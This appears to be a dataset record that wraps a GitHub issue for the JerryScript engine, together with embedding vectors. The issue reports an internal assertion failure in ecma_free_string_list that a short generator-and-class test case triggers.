0.0038770174141973257, -0.012179545126855373, -0.00589817576110363, -0.019941093400120735, 0.010624229907989502, -0.005135545507073402, 0.0038056382909417152, 0.019009407609701157, -0.009204159490764141, -0.0004188831662759185, 0.0032364830840379, -0.009429567493498325, 0.0135470200330019, 0.012292249128222466, -0.005338412709534168, 0.016439756378531456, -0.01286328211426735, -0.009181618690490723, -0.005999609362334013, -0.003993478137999773, 0.014906981959939003, 0.009722597897052765, -0.0009269903530366719, -0.026327652856707573, -0.025350885465741158, -0.0014783007791265845, 0.01930995099246502, 0.0046434043906629086, 0.00719427177682519, -0.010894719511270523, 0.004222643095999956, 0.013787454925477505, -0.0006640143692493439, 0.011668620631098747, -0.01342680212110281, -0.017777176573872566, -0.0006832679500803351, 0.010556607507169247, 0.0020737533923238516, -0.011465753428637981, 0.003452498931437731, 0.008144741877913475, -0.015042226761579514, -0.002436284674331546, 0.027935562655329704, 0.004891353193670511, -0.017611877992749214, -0.015049739740788937, -0.010451417416334152, -0.002039942191913724, -0.0004409543762449175, 0.012044300325214863, -0.011345535516738892, -0.01893427036702633, 0.02030174620449543, 0.021383704617619514, -0.009091455489397049, 0.011518348008394241, -0.013171340338885784, 0.004865055903792381, -0.01052655279636383, 0.022420581430196762, -0.010564121417701244, 0.0002737767936196178, 0.0011091951746493578, -0.02749977447092533, 0.00846782699227333, 0.012930904515087605, 0.0014247663784772158, -0.0010631743352860212, -0.013734860345721245, -0.0010049439733847976, 0.0005329959676600993, -0.01350945234298706, -0.012066841125488281, -0.006518047768622637, 0.005665254313498735, -0.0071642170660197735, -0.006194962654262781, 0.02091786079108715, 0.022916479036211967, -0.004880082793533802, 0.02003125660121441, 0.02637273445725441, 0.0014585775788873434, 0.009940491989254951, 0.011578457430005074, -0.004632133990526199, 0.008422745391726494, -0.009264267981052399, -0.010564121417701244, 0.025230666622519493, -0.005052895750850439, 0.0020004957914352417, -0.005650226958096027, -0.017055870965123177, -0.007896793074905872, -0.007250623777508736, -0.011458239518105984, 0.024028491228818893, 0.016575001180171967, 0.019264869391918182, -0.0061348541639745235, -0.009091455489397049, -0.002928425557911396, 0.012450034730136395, 0.0034168094862252474, -0.022375499829649925, 0.0066495356149971485, 0.006172421853989363, -0.015598232857882977, -0.0022597149945795536, 0.03357076272368431, -0.009557298384606838, -0.024539416655898094, -0.00046701717656105757, -0.01837826520204544, -0.026087217032909393, -0.006142367608845234, 0.025801701471209526, 0.012780632823705673, 0.016003966331481934, 0.010015628300607204, -0.011841433122754097, -0.0030730622820556164, 0.006694617215543985, 0.006717158015817404, 0.0016839854652062058, -0.0034618910867720842, 0.0007537079509347677, 0.0045457277446985245, 0.028311243280768394, -0.0052482495084404945, 0.006518047768622637, -0.030099479481577873, -0.0070815677754580975, 0.023171940818428993, 0.010534066706895828, 0.0020249150693416595, 0.0011035599745810032, 0.01677035354077816, 0.02054218202829361, 0.012607820332050323, 0.0006161151686683297, -0.0020606047473847866, 0.002047455869615078, 0.00996303278952837, 0.003144441405311227, -0.013073663227260113, -0.013036095537245274, 0.016830462962388992, 0.0072017852216959, 0.01625942997634411, 0.0007288191700354218, -0.006762239616364241, -0.018648754805326462, -0.0011721214978024364, -0.005082949995994568, 0.034412287175655365, -0.0015402878634631634, -0.017085924744606018, -0.025876836851239204, 0.011480780318379402, 0.012870796024799347, -0.006683346815407276, -0.0296636912971735, -0.033690981566905975, 0.015598232857882977, -0.0006583791691809893, -0.02091786079108715, 0.021473867818713188, 0.010609203018248081, -0.009113996289670467, -0.010601689107716084, -0.00936194509267807, 0.01837826520204544, 0.01111261360347271, -0.018363237380981445, 0.03131668269634247, 0.012855769135057926, 0.03471282869577408, -0.006709644570946693, -0.018528535962104797, 0.0057629309594631195, 0.019595468416810036, -0.0004651387862395495, 0.010188440792262554, -0.0032158205285668373, -0.007430950179696083, 0.012337330728769302, 0.013982809148728848, -0.0021263486705720425, -0.004263967741280794, 0.0017797838663682342, 0.010248550213873386, 0.003394268685951829, -0.007235596422106028, 0.015928830951452255, 0.01580861397087574, 0.015094821341335773, -0.0053910077549517155, -0.007066540420055389, -0.01845340058207512, -0.003907071892172098, -0.008986265398561954, 0.015184984542429447, 0.005270790308713913, 0.008317554369568825, 0.02222522720694542, 0.02832627110183239, 0.0027443422004580498, -0.0020174013916403055, 0.024253899231553078, -0.005056652706116438, -0.00791933387517929, 0.01738646999001503, -0.002911519957706332, -0.0025377182755619287, 0.007160460576415062, 0.001525260740891099, 0.018122801557183266, 0.011127641424536705, 0.004583295900374651, 0.00038201958523131907, 0.012239653617143631, 0.009579839184880257, -0.02407357282936573, -0.0009434263338334858, -0.01827307417988777, 0.01687554456293583, 0.008295013569295406, -0.0027612478006631136, -0.012765605933964252, -0.015973912551999092, 0.01920475997030735, 0.04625371843576431, -0.002426892751827836, -0.023126859217882156, -0.004233913496136665, 0.006315180566161871, -0.0048763263039290905, -0.022585880011320114, -0.000530178367625922, -0.006630751769989729, 0.027695128694176674, 0.01607910357415676, -0.003617798211053014, 0.0026466655544936657, 0.008835992775857449, -0.00648047961294651, -0.0009429567726328969, 0.007754034828394651, 0.021714303642511368, -0.015523096546530724, 0.007228082977235317, -0.0057629309594631195, -0.00791933387517929, 0.004226399585604668, 0.01064677070826292, 0.0016154239419847727, -0.003685420611873269, -0.00648047961294651, -0.013223934918642044, -0.012232140637934208, 0.011713702231645584, -0.0066908602602779865, 0.00824993196874857, -0.011743756011128426, 0.0026729630772024393, -0.0005475535872392356, -0.024479307234287262, -0.01607910357415676, -0.009902924299240112, 0.006367775611579418, 0.013464370742440224, -0.034352175891399384, -0.014290866442024708, -0.0024945151526480913, 0.0075361402705311775, -0.016409700736403465, -0.0057216063141822815, -0.0037361374124884605, -0.014238270930945873, -0.009301836602389812, 0.003978450782597065, 0.009542271494865417, -0.00023843938834033906, -0.019535358995199203, -0.0001228003966389224, -0.0003639399947132915, 0.00864063948392868, -0.026252517476677895, 0.005379737354815006, 0.01971568539738655, -0.012134463526308537, 0.0024794877972453833, 0.014493733644485474, 0.0057441471144557, 0.010751960799098015, 0.009602379985153675, 0.0005757295875810087, -0.01564331352710724, -0.013051122426986694, 0.015387851744890213, 0.00044283276656642556, -0.02054218202829361, -0.007731494028121233, 0.005965798161923885, 0.001083836774341762, 0.007896793074905872, 0.013862591236829758, 0.008069605566561222, 0.005368466954678297, 0.007111622020602226, -0.004523186944425106, 0.00936194509267807, -0.00876085739582777, 0.0006245679687708616, 0.014478706754744053, 0.003982207737863064, -0.002896492602303624, -0.022135064005851746, 0.015012172050774097, -0.01178132463246584, 0.016454782336950302, -0.010158387012779713, 0.009023833088576794, -0.0435488224029541, 0.004515673499554396, 0.012803173623979092, 0.010135846212506294, -0.01934000477194786, 0.0011392495362088084, 0.012690469622612, -0.020722508430480957, 0.0118339192122221, 0.0019873471464961767, 0.018558591604232788, 0.001577855902723968, -0.01397529523819685, 0.03892044723033905, -0.008633125573396683, 0.00007425549847539514, 0.0019873471464961767, -0.037778377532958984, 0.020076338201761246, 0.009339404292404652, -0.027935562655329704, -0.014906981959939003, -0.008993778377771378, -0.026177380234003067, 0.009444594383239746, -0.03768821433186531, -0.004782406147569418, -0.011886514723300934, -0.0035407838877290487, 0.012750578112900257, 0.0152601208537817, -0.013531993143260479, -0.005158086307346821, -0.030775703489780426, 0.0043879421427845955, 0.00750232907012105, -0.0318877175450325, -0.012592792510986328, -0.0036685150116682053, 0.0019187855068594217, 0.0006851463695056736, -0.01457638293504715, 0.05292579531669617, -0.002601583953946829, 0.008122201077640057, 0.006495506968349218, -0.00934691820293665, -0.0033886334858834743, -0.01588374935090542, -0.022450635209679604, -0.0025640157982707024, -0.008490367792546749, -0.017536740750074387, -0.009745138697326183, 0.0012557103764265776, -0.001740337465889752, -0.00416629109531641, -0.002875830279663205, 0.0026109758764505386, 0.0028795870020985603, -0.012352357618510723, 0.0014069215394556522, -0.005653983913362026, -0.0069237821735441685, 0.028882276266813278, -0.01411054003983736, -0.01251765713095665, 0.005364709999412298, 0.010616715997457504, 0.007306975778192282, 0.020016228780150414, -0.0007574647897854447, 0.020121419802308083, -0.009767679497599602, -0.012232140637934208, 0.007716466672718525, 0.02685360424220562, 0.022270308807492256, 0.0008988143526948988, 0.02009136602282524, -0.026673277840018272, -0.015718450769782066, 0.02266101725399494, 0.02129354141652584, 0.00069970398908481, 0.013208908028900623, 0.004203858785331249, -0.009144051000475883, 0.002819478278979659, -0.01636461913585663, 0.029603581875562668, -0.025801701471209526, -0.010751960799098015, 0.008272472769021988, -0.02380308322608471, -0.01923481561243534, 0.0025508671533316374, -0.023126859217882156, -0.005236979108303785, -0.010669311508536339, 0.004207615740597248, -0.012187059037387371, -0.012164518237113953, -0.010030655190348625, -0.009151563979685307, 0.01235987152904272, -0.009932979010045528, 0.005943257361650467, 0.02746972069144249, 0.02359270304441452, -0.036335766315460205, 0.002678598277270794, 0.008001983165740967, -0.007235596422106028, 0.005815526004880667, 0.01834820955991745, -0.0043729147873818874, -0.034682776778936386, 0.02174435742199421, 0.007051513064652681, -0.0012679198989644647, 0.00819733738899231, -0.031196465715765953, -0.003418687731027603, -0.01196916401386261, 0.006112313363701105, -0.002286012750118971, -0.027409611269831657, 0.0027969374787062407, 0.008580530993640423, 0.0011157694971188903, 0.016469810158014297, 0.006157394964247942, 0.021443814039230347, -0.030054397881031036, 0.0027650047559291124, 0.009452108293771744, 0.005545036401599646, -0.010519039817154408, 0.0041738045401871204, -0.0005545975873246789, -0.0024325279518961906, -0.007254380267113447, 0.017100952565670013, -0.025876836851239204, -0.014298380352556705, 0.004143750295042992, 0.00019406218780204654, 0.0030279806815087795, -0.020692452788352966, -0.004850028548389673, 0.012592792510986328, -0.015598232857882977, 0.03351065516471863, -0.011706188321113586, 0.006724671460688114, 0.011270399205386639, -0.0037567997351288795, 0.00272555835545063, 0.011668620631098747, 0.012983500026166439, 0.0005729119875468314, -0.013704805634915829, -0.019640550017356873, 0.03333032876253128, 0.020391909405589104, -0.01779220439493656, -0.004263967741280794, 0.0023573918733745813, 0.032218314707279205, 0.012254681438207626, -0.01570342294871807, 0.027048958465456963, -0.009256755001842976, 0.017161061987280846, 0.032248370349407196, 0.007036486174911261, 0.021594084799289703, -0.013163826428353786, 0.016725271940231323, 0.003621554933488369, -0.020346827805042267, -0.011322994716465473, 0.0456225760281086, 0.00381127349101007, 0.004068613983690739, 0.008407717570662498, 0.016003966331481934, -0.017777176573872566, 0.003929612692445517, 0.009647461585700512, -0.026838578283786774, 0.006540588568896055, 0.013524479232728481, -0.006360262166708708, 0.005680281203240156, 0.002731193555518985, -0.004177561495453119, 0.011262886226177216, 0.004782406147569418, -0.016169266775250435, -0.014861900359392166, -0.01690559834241867, -0.002541474997997284, -0.01556817814707756, 0.009076428599655628, 0.0016079102642834187, 0.016575001180171967, -0.010361254215240479, -0.017536740750074387, 0.0241787638515234, -0.003155711805447936, 0.0037398941349238157, -0.012938418425619602, 0.005161842796951532, -0.007690169382840395, 0.0178372859954834, -0.012991013936698437, -0.0004217007663100958, -0.004692242946475744, 0.027048958465456963, 0.010729419998824596, 0.017266251146793365, 0.0018474062671884894, -0.012344843707978725, -0.009902924299240112, -0.009181618690490723, 0.004590809345245361, -0.0019084543455392122, -0.020692452788352966, 0.009940491989254951, 0.0018586766673251987, 0.0019009406678378582, -0.042166322469711304, 0.020632345229387283, -0.0031256573274731636, -0.004714783746749163, 0.017777176573872566, 0.02027169242501259, -0.00014134959201328456, 0.008257445879280567, -0.01193159632384777, 0.0030862109269946814, 0.0008147559710778296, -0.021008023992180824, 0.008302527479827404 ]
1,744
null
null
null
null
null
null
null
null
null
[ "jerryscript-project", "jerryscript" ]
###### JerryScript revision 8ba0d1b6ee5a065a42f3b306771ad8e3c0d819bc ###### Build platform Ubuntu 18.04.5 LTS (Linux 4.15.0-128-generic x86_64) ###### Build steps ```sh ./tools/build.py --clean --debug --logging=on ``` ###### Test case ```js function* g() { class A extends (yield) {} } g().next(); ``` ###### Execution steps & output ``` $ ./build/bin/jerry test.js ICE: Assertion 'ECMA_STRING_IS_REF_EQUALS_TO_ONE (string_p)' failed at jerryscript/jerry-core/ecma/base/ecma-literal-storage.c(ecma_free_string_list):77. Error: ERR_FAILED_INTERNAL_ASSERTION Aborted (core dumped) ```
Assertion 'ECMA_STRING_IS_REF_EQUALS_TO_ONE (string_p)' in ecma_free_string_list
https://api.github.com/repos/jerryscript-project/jerryscript/issues/4525/comments
1
2021-01-22T11:09:58
2021-10-01T10:28:41Z
https://github.com/jerryscript-project/jerryscript/issues/4525
791,916,812
4,525
false
This is a GitHub Issue repo:jerryscript owner:jerryscript-project Title : Assertion 'ECMA_STRING_IS_REF_EQUALS_TO_ONE (string_p)' in ecma_free_string_list Issue date: --- start body --- ###### JerryScript revision 8ba0d1b6ee5a065a42f3b306771ad8e3c0d819bc ###### Build platform Ubuntu 18.04.5 LTS (Linux 4.15.0-128-generic x86_64) ###### Build steps ```sh ./tools/build.py --clean --debug --logging=on ``` ###### Test case ```js function* g() { class A extends (yield) {} } g().next(); ``` ###### Execution steps & output ``` $ ./build/bin/jerry test.js ICE: Assertion 'ECMA_STRING_IS_REF_EQUALS_TO_ONE (string_p)' failed at jerryscript/jerry-core/ecma/base/ecma-literal-storage.c(ecma_free_string_list):77. Error: ERR_FAILED_INTERNAL_ASSERTION Aborted (core dumped) ``` --- end body ---
830
[ 0.0045494926162064075, 0.01881307177245617, -0.007456217426806688, 0.007906290702521801, 0.008461381308734417, -0.008903954178094864, 0.007418711204081774, 0.0354657918214798, -0.037926193326711655, 0.005022069904953241, -0.019578196108341217, 0.017447849735617638, 0.012189490720629692, 0.011956952512264252, 0.01660771109163761, 0.03297538310289383, -0.029899882152676582, 0.008678916841745377, -0.03261532634496689, -0.03426559641957283, 0.004088167566806078, 0.001957819564267993, -0.030785026028752327, 0.013809754513204098, 0.0012845847522839904, -0.0006282276008278131, 0.0022972500883042812, -0.009279015474021435, -0.009399035014212132, -0.01098929438740015, 0.0018002939177677035, -0.009916619397699833, -0.019488181918859482, 0.0393364243209362, 0.011514379642903805, 0.008708922192454338, 0.052088506519794464, 0.04479731619358063, 0.00018295955669600517, -0.006312280893325806, -0.0018968721851706505, -0.030995061621069908, -0.0336654968559742, 0.014514870010316372, 0.03852628916501999, 0.05805948004126549, 0.03378551825881004, 0.000584157882258296, -0.022278638556599617, 0.024589015170931816, 0.012392023578286171, 0.006991141475737095, 0.011311846785247326, -0.05682927742600441, 0.017612876370549202, -0.016517696902155876, 0.029089750722050667, -0.0009568749810568988, 0.016592709347605705, -0.00844637956470251, -0.012257001362740993, 0.010509216226637363, -0.01215948536992073, 0.011236834339797497, 0.013157147914171219, 0.0645105317234993, -0.0007740326109342277, -0.011101813055574894, 0.02266870066523552, 0.001058610389009118, 0.004391967318952084, -0.0066985939629375935, 0.02014829032123089, 0.04434724152088165, -0.008828941732645035, -0.01999826543033123, -0.0012011335929855704, 0.03267533704638481, -0.001987824682146311, -0.009616570547223091, 0.0006502624019049108, -0.004943307023495436, -0.0070699043571949005, -0.0008443566039204597, -0.012279504910111427, -0.011034301482141018, -0.02503908798098564, -0.07021146267652512, -0.005475894082337618, 0.00762124452739954, -0.02140849642455578, 0.038466282188892365, -0.019698215648531914, -0.009128990583121777, -0.015497530810534954, 0.026569338515400887, -0.010501714423298836, 0.01070424821227789, -0.025684194639325142, -0.003379301866516471, 0.008146329782903194, -0.011896942742168903, -0.014177314937114716, -0.0009339025127701461, -0.008993968367576599, 0.01561755035072565, 0.014402351342141628, 0.0032199006527662277, 0.04272697493433952, 0.12374020367860794, 0.01318715326488018, -0.03483568876981735, -0.024348976090550423, -0.030154922977089882, -0.0014674271224066615, 0.002972360234707594, -0.002098467666655779, -0.009429039433598518, 0.0038293753750622272, 0.02421395294368267, -0.026149269193410873, -0.02061336487531662, -0.014679896645247936, -0.0111168147996068, -0.014822420664131641, 0.023118775337934494, 0.02043333649635315, 0.003169267438352108, 0.0208234004676342, -0.005153341218829155, -0.05430886894464493, -0.01224950049072504, 0.0005532153300009668, 0.0005522776627913117, 0.038856346160173416, -0.0007684067240916193, -0.01935316063463688, 0.05199848860502243, -0.037566132843494415, -0.03600588068366051, -0.04539741203188896, -0.02421395294368267, 0.04674763232469559, 0.0023122525308281183, -0.01488243043422699, -0.004827038384974003, -0.00866391509771347, 0.03117509000003338, -0.01293961238116026, 0.008408873341977596, -0.000653544208034873, -0.020373325794935226, 7.691685510735624e-8, 0.01765788346529007, -0.007148667238652706, -0.011484375223517418, -0.0165777076035738, 0.0362459197640419, -0.00002238646811747458, 0.027019411325454712, -0.054038822650909424, -0.024664027616381645, 0.0003045028424821794, -0.012782086618244648, -0.057639412581920624, -0.003278035204857588, -0.020478343591094017, 0.033425457775592804, -0.018543027341365814, 0.015692561864852905, -0.004155678674578667, 0.019368162378668785, 0.03141513094305992, 0.02370387129485607, -0.019158128648996353, -0.0027454483788460493, 0.021498510614037514, 0.02208360657095909, -0.003431810298934579, -0.00659357663244009, 0.005355874542146921, 0.020778393372893333, 0.005670926067978144, 0.007197425235062838, 0.018828073516488075, -0.024964075535535812, 0.005820950493216515, -0.012272004038095474, -0.0018659296911209822, -0.033995550125837326, 0.008821439929306507, 0.0046807643957436085, 0.009864110499620438, 0.010516717098653316, 0.007493723649531603, 0.03375551104545593, 0.005689679179340601, -0.028159597888588905, -0.014207319356501102, -0.01133435033261776, 0.05661924555897713, -0.01374974474310875, -0.02824961207807064, -0.023883899673819542, -0.013239662162959576, -0.019008103758096695, 0.006087244022637606, 0.011049304157495499, 0.022713709622621536, 0.014552376233041286, -0.018182968720793724, -0.004159429110586643, 0.039576463401317596, -0.034355610609054565, 0.005265859887003899, 0.0027773284818977118, 0.007354950997978449, 0.015452522784471512, -0.019368162378668785, -0.0036193409468978643, 0.011236834339797497, -0.02248867228627205, -0.03879633545875549, -0.028669681400060654, -0.038976363837718964, -0.04467729479074478, -0.024423988536000252, 0.023613855242729187, -0.005637170281261206, 0.023433826863765717, 0.01048671267926693, -0.003994402009993792, 0.0026591841597110033, 0.01309713814407587, 0.009234007447957993, 0.013892268761992455, -0.00625977199524641, -0.03795619681477547, 0.005273361224681139, 0.009279015474021435, 0.011304345913231373, -0.005573410075157881, -0.05055825412273407, -0.025999244302511215, 0.010231670923531055, 0.010314184240996838, -0.02950981818139553, -0.047947827726602554, -0.004215688444674015, 0.025609182193875313, -0.02593923546373844, -0.03249530494213104, 0.0025654188357293606, -0.0283996369689703, 0.01412480603903532, 0.004114422015845776, -0.005978476256132126, 0.01224950049072504, -0.03087504208087921, -0.03012491948902607, 0.011101813055574894, 0.008588902652263641, -0.04734773188829422, 0.03294537961483002, 0.019338157027959824, 0.005063326563686132, -0.03261532634496689, 0.0010876775486394763, -0.02878970094025135, 0.005475894082337618, 0.05001816526055336, -0.02598424255847931, -0.0019240641267970204, 0.014304835349321365, -0.037746164947748184, -0.019938254728913307, 0.0018115458078682423, 0.017102792859077454, -0.011626898311078548, -0.025534169748425484, 0.02122846618294716, 0.026689358055591583, 0.005483395420014858, 0.02896972931921482, 0.021168455481529236, 0.00936902966350317, 0.01560254767537117, -0.0036624730564653873, -0.0035930867306888103, -0.027724526822566986, -0.0012489539803937078, -0.026959402486681938, 0.009166496805846691, -0.0027585753705352545, -0.005479644518345594, -0.00004814262501895428, 0.0056409211829304695, -0.011859436519443989, 0.00864891242235899, -0.0011158072156831622, -0.006616080179810524, -0.035765841603279114, -0.023583849892020226, 0.0025672942865639925, -0.046387575566768646, -0.00819883868098259, -0.007568735629320145, 0.016697727143764496, 0.0045419917441904545, -0.026029249653220177, 0.061029963195323944, -0.041676804423332214, 0.010959289036691189, -0.0240339245647192, -0.025639185681939125, -0.017027780413627625, 0.056019145995378494, -0.022173620760440826, -0.005865957587957382, 0.02472403645515442, 0.0035124486312270164, -0.039696481078863144, -0.05025820806622505, 0.020043272525072098, 0.045967504382133484, 0.006188510451465845, -0.03834626078605652, 0.008753929287195206, -0.04056662321090698, 0.0007023021462373435, 0.00834136176854372, -0.02086840756237507, -0.017432846128940582, 0.023883899673819542, -0.03543578460812569, -0.06835115700960159, -0.05985977500677109, 0.0168327484279871, 0.033965546637773514, -0.0177328959107399, -0.00028410888626240194, -0.017957931384444237, -0.019443174824118614, -0.004489482846111059, 0.01479241531342268, 0.008026310242712498, 0.006372290663421154, 0.01596260629594326, 0.040236569941043854, -0.012084472924470901, 0.0009432790102437139, 0.030094914138317108, 0.00139147718437016, -0.007471220102161169, 0.050138186663389206, -0.03747611865401268, -0.014132307842373848, -0.005580911412835121, 0.01953318901360035, 0.026824379339814186, 0.002854216145351529, -0.04362712427973747, 0.017567869275808334, 0.011311846785247326, 0.017882920801639557, -0.03267533704638481, 0.012129480950534344, 0.011731915175914764, -0.009166496805846691, -0.010494213551282883, -0.03528575971722603, 0.02770952507853508, -0.0060084811411798, -0.03888634964823723, -0.002100342884659767, -0.04932805523276329, 0.0413767546415329, 0.01120682992041111, -0.001224574982188642, 0.004020656459033489, 0.012872101739048958, -0.011514379642903805, 0.022503674030303955, -0.03321542218327522, 0.019038109108805656, 0.02079339511692524, -0.030965056270360947, 0.02817459963262081, 0.010104149580001831, -0.02539914660155773, -0.02763451263308525, 0.025324134156107903, -0.06081993132829666, -0.02994488924741745, -0.009901616722345352, 0.05466892570257187, -0.012692072428762913, -0.04068664461374283, 0.0030811280012130737, -0.024589015170931816, -0.0120169622823596, -0.026044253259897232, 0.013082136400043964, -0.013224659487605095, -0.009924120269715786, 0.022788720205426216, 0.00850638933479786, -0.036846015602350235, 0.027694521471858025, 0.042156882584095, 0.032915376126766205, -0.030499979853630066, 0.00014076517254579812, 0.027289455756545067, 0.044197216629981995, 0.04731772467494011, 0.03801620751619339, -0.0210784412920475, -0.006019732914865017, 0.011716913431882858, -0.02803957834839821, -0.026224281638860703, 0.03888634964823723, -0.007377454545348883, 0.00020581485296133906, -0.03297538310289383, -0.025564173236489296, 0.011889440938830376, -0.011746917851269245, -0.02133348397910595, -0.03549579530954361, 0.0009948499500751495, 0.015062459744513035, 0.06217015162110329, 0.0041781822219491005, -0.07117161899805069, -0.016082625836133957, -0.027484487742185593, -0.01689275912940502, 0.009219005703926086, 0.003197397105395794, 0.017252817749977112, -0.029854875057935715, -0.009264012798666954, 0.00010859195026569068, -0.01426732912659645, -0.0678710788488388, 0.010149157606065273, 0.011769421398639679, 0.030755022540688515, 0.010869274847209454, 0.018032943829894066, -0.014079798944294453, 0.003390553640201688, 0.009166496805846691, 0.007246183231472969, -0.015272493474185467, -0.0002808271092362702, 0.004714519716799259, 0.014424854889512062, -0.008843944407999516, -0.004046910908073187, -0.0014777412870898843, 0.0006343223503790796, -0.05070827901363373, 0.01444735936820507, 0.03951645269989967, -0.023988917469978333, -0.00967658031731844, -0.02490406669676304, -0.024093933403491974, -0.009406535886228085, -0.008266349323093891, 0.03483568876981735, -0.023823890835046768, -0.01837800070643425, 0.017027780413627625, -0.008641410619020462, 0.009691582061350346, 0.01650269515812397, -0.010021636262536049, -0.0026666854973882437, -0.02932978980243206, 0.037176068872213364, 0.016082625836133957, -0.012174488045275211, 0.0240339245647192, 0.006597327068448067, -0.01338968612253666, -0.0004978937795385718, 0.026569338515400887, 0.02485905960202217, -0.03762614354491234, -0.02100342884659767, 0.01428983360528946, 0.0063872928731143475, -0.031055070459842682, -0.02356884814798832, -0.00353120150975883, 0.027034414932131767, 0.013457197695970535, -0.06223016232252121, 0.04107670858502388, 0.04425722733139992, 0.014117305167019367, -0.012872101739048958, -0.04434724152088165, 0.030695011839270592, 0.010171661153435707, -0.01827298291027546, -0.011026800610125065, -0.060699909925460815, -0.003339920425787568, -0.018753062933683395, -0.011161822825670242, -0.00888145063072443, -0.0006343223503790796, 0.02359885349869728, 0.033965546637773514, 0.021468505263328552, -0.030169926583766937, -0.010944287292659283, -0.02118345908820629, 0.03567582368850708, 0.01804794743657112, 0.02161853015422821, 0.01755286566913128, -0.001515247393399477, -0.00902397371828556, -0.05283862724900246, -0.026254286989569664, 0.013517207466065884, -0.015527535229921341, 0.05868958309292793, -0.006128500681370497, -0.001235826755873859, -0.013719740323722363, 0.035405781120061874, -0.014139808714389801, -0.00017592716903891414, 0.02406392991542816, 0.027289455756545067, -0.015527535229921341, 0.018723057582974434, 0.008836442604660988, 0.03027494251728058, -0.021498510614037514, 0.007726261392235756, 0.013149647042155266, 0.014109804295003414, -0.029569828882813454, -0.019788231700658798, -0.017747897654771805, -0.0026891890447586775, -0.006214764900505543, -0.008318858221173286, -0.0005644671618938446, 0.02806958369910717, 0.006192260887473822, 0.00038560983375646174, -0.004121922887861729, 0.004358211532235146, -0.005370876751840115, -0.01830298826098442, -0.021378491073846817, -0.00762124452739954, 0.009646574966609478, 0.033425457775592804, -0.05850955471396446, 0.00967658031731844, 0.01722281239926815, -0.006548569072037935, 0.02061336487531662, -0.03405556082725525, 0.011416864581406116, 0.0007815338321961462, -0.02053835429251194, 0.005025820806622505, -0.031505145132541656, -0.014784914441406727, 0.02997489459812641, -0.01747785322368145, -0.02817459963262081, 0.02958483062684536, 0.0008424813277088106, -0.02310377173125744, 0.019848240539431572, 0.0029404801316559315, 0.011161822825670242, -0.03459564968943596, -0.015722567215561867, 0.019788231700658798, -0.0054158843122422695, -0.003173018107190728, 0.004031908232718706, -0.011274340562522411, -0.011724414303898811, 0.01098929438740015, 0.036335933953523636, -0.006481058429926634, 0.017057785764336586, 0.007561234757304192, 0.02061336487531662, -0.033965546637773514, -0.03627592325210571, 0.03477567806839943, 0.01632266491651535, -0.011776923201978207, -0.006968637928366661, 0.012174488045275211, -0.0025110349524766207, 0.028519656509160995, 0.0242889653891325, -0.018903085961937904, -0.005115835461765528, -0.008521391078829765, -0.0009667203412391245, 0.013427192345261574, 0.01290210708975792, 0.014762409962713718, 0.04011654853820801, -0.03927641361951828, -0.01259455643594265, -0.016667721793055534, 0.0025485411752015352, 0.0385562963783741, -0.016082625836133957, -0.004752025939524174, -0.02125847153365612, -0.010186662897467613, -0.001237702090293169, -0.0021209712140262127, -0.004080666229128838, 0.006417297758162022, -0.016127632930874825, 0.05505898967385292, 0.01819797046482563, 0.011019298806786537, 0.0028973480220884085, -0.020268309861421585, 0.009871612302958965, 0.024423988536000252, -0.0242889653891325, -0.021018432453274727, -0.007673752959817648, 0.004887048155069351, 0.006271023768931627, -0.0004395248834043741, 0.009399035014212132, 0.019218137487769127, -0.0022991253063082695, -0.0062485202215611935, 0.025354139506816864, 0.0066985939629375935, 0.003863130696117878, 0.009699083864688873, 0.04191684350371361, 0.0431770496070385, 0.001626828103326261, 0.001071737497113645, -0.03243529424071312, 0.0020628368947654963, -0.022323645651340485, -0.0072949412278831005, 0.026434315368533134, -0.02370387129485607, -0.029314786195755005, 0.02554917149245739, 0.0016615212662145495, 0.011244336143136024, -0.027979567646980286, -0.01999826543033123, 0.011671905405819416, 0.008183836005628109, -0.002869218587875366, -0.015279995277523994, -0.04620754346251488, -0.007437464315444231, -0.023508839309215546, 0.010944287292659283, -0.015662556514143944, -0.0068898750469088554, 0.016367672011256218, 0.008176335133612156, 0.005869708489626646, -0.011004297062754631, -0.006132251117378473, 0.01809295453131199, -0.0005757189937867224, -0.020928416401147842, -0.006784857716411352, 0.019803233444690704, 0.04410720244050026, 0.0015790078323334455, -0.0067398506216704845, -0.004174431785941124, 0.02328380197286606, 0.023193787783384323, -0.03534577041864395, -0.03534577041864395, -0.0168327484279871, 0.022548681125044823, -0.021813562139868736, -0.017612876370549202, 0.001542439335025847, 0.030214933678507805, 0.009128990583121777, -0.015917599201202393, 0.019368162378668785, 0.022473668679594994, -0.017057785764336586, 0.01561755035072565, -0.012384521774947643, 0.01765788346529007, 0.004977062810212374, -0.019158128648996353, 0.0013811630196869373, 0.009173997677862644, -0.008873948827385902, -0.007028647698462009, -0.025894228368997574, -0.026149269193410873, -0.048517923802137375, -0.03279535472393036, -0.01596260629594326, -0.026134267449378967, -0.00369810382835567, 0.01606762409210205, 0.006147253792732954, 0.0053633758798241615, -0.032555315643548965, -0.021168455481529236, 0.01398228295147419, 0.001997201004996896, -0.033425457775592804, 0.0060122315771877766, -0.024333972483873367, 0.003308040089905262, 0.011161822825670242, -0.00416317954659462, 0.019233141094446182, 0.018002940341830254, -0.014747408218681812, -0.013742243871092796, 0.014657393097877502, -0.014567378908395767, -0.011949450708925724, -0.011544384993612766, -0.017312826588749886, 0.0045419917441904545, -0.013922273181378841, 0.010074145160615444, 0.04569746181368828, -0.028204604983329773, -0.014364845119416714, 0.01106430683284998, 0.027649514377117157, -0.021453503519296646, -0.00960156787186861, 0.008678916841745377, -0.020013267174363136, 0.0016896509332582355, 0.0031673922203481197, 0.023538842797279358, 0.010839269496500492, -0.0009268700960092247, 0.028009572997689247, -0.045667458325624466, -0.011469372548162937, 0.03456564247608185, 0.016382675617933273, -0.0196682121604681, -0.02115345373749733, 0.004234441556036472, 0.025894228368997574, -0.01603761874139309, 0.000555559468921274, 0.01783791184425354, -0.0012489539803937078, 0.012909607961773872, -0.011844433844089508, -0.0043169548735022545, -0.0013989784056320786, 0.013292170129716396, 0.0169677697122097, 0.01801794208586216, 0.03126510605216026, -0.0044969841837882996, 0.022353649139404297, 0.0054608918726444244, -0.036876022815704346, -0.03375551104545593, 0.036305926740169525, 0.007891288958489895, -0.007632496301084757, -0.034145575016736984, 0.0036793507169932127, 0.02914975956082344, -0.015842586755752563, -0.012459534220397472, 0.01398228295147419, -0.006372290663421154, -0.0005593100795522332, 0.003983150236308575, 0.0030379961244761944, 0.009031474590301514, -0.0035349521785974503, -0.0011908194283023477, -0.019953258335590363, 0.03519574552774429, -0.005243356339633465, 0.00659357663244009, 0.007662501186132431, -0.018077950924634933, 